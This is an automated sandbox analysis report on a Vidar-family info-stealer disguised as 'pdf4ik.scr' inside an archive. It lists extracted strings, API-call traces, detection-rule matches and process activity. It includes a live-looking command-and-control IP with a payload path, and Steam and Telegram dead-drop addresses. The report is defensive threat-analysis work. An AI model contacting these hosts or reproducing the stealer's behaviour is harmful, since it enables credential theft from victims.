Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199486572327
Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199486572327http://135.181.87.234:80update.zip;open_open
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/:
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/X
Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/zaskullz
Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/zaskullzfunkstaredit.zipMozilla/5.0
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/88.0.1/releasenotes
Source: unknown DNS traffic detected: queries for: t.me
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D91560 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 12_2_29D91560
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA50A0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 12_2_29DA50A0

System Summary

Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBF98E 12_2_29DBF98E
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 12_2_29D90880
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D958A0 12_2_29D958A0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DC1844 12_2_29DC1844
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DAC840 12_2_29DAC840
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBA81A 12_2_29DBA81A
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DAEB70 12_2_29DAEB70
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DC0B0C 12_2_29DC0B0C
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DABA00 12_2_29DABA00
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8BC60 12_2_29D8BC60
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB9C15 12_2_29DB9C15
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBAC02 12_2_29DBAC02
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DABF80 12_2_29DABF80
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBFEDF 12_2_29DBFEDF
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8B1E0 12_2_29D8B1E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8C0E0 12_2_29D8C0E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBA0AA 12_2_29DBA0AA
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBA448 12_2_29DBA448
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DC0430 12_2_29DC0430
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8D7B0 12_2_29D8D7B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8A7A0 12_2_29D8A7A0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9C6C0 12_2_29D9C6C0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: String function: 29D84750 appears 118 times
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: String function: 29DB5A50 appears 44 times
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: String function: 29D89100 appears 66 times
Source: C:\Program Files\7-Zip\7zG.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: wininet.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: schannel.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74C60000 page read and write
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74C69000 page read and write
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 75D70000 page read and write
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 75D71000 page read and write
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74510000 page read and write
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\pdf_novichki\" -spe -an -ai#7zMap2692:86:7zEvent4577
Source: unknown Process created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr "C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr" /S
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C94.tmp
Source: classification engine Classification label: mal80.troj.spyw.evad.winRAR@4/8@1/5
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8FA90 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 12_2_29D8FA90
Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA3B10 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,Process32Next,CloseHandle, 12_2_29DA3B10
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6916
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_02
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: pdf_novichki.rar Static file information: File size 6238622 > 1048576
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB5A95 push ecx; ret 12_2_29DB5AA8
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB07BE push ecx; ret 12_2_29DB07D1
Source: pdf4ik.scr.9.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_29DA8390

Persistence and Installation Behavior

Source: C:\Program Files\7-Zip\7zG.exe File created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
Source: C:\Program Files\7-Zip\7zG.exe File created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_29DA8390
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API coverage: 7.9 %
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA2E90 GetSystemInfo, 12_2_29DA2E90
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 12_2_29D9B960
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D93B60
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW, 12_2_29DA4C40
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9CE80
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D96160
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 12_2_29D90130
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9E060
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA, 12_2_29D8F3E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose, 12_2_29D9B520
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D964B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA, 12_2_29D9E470
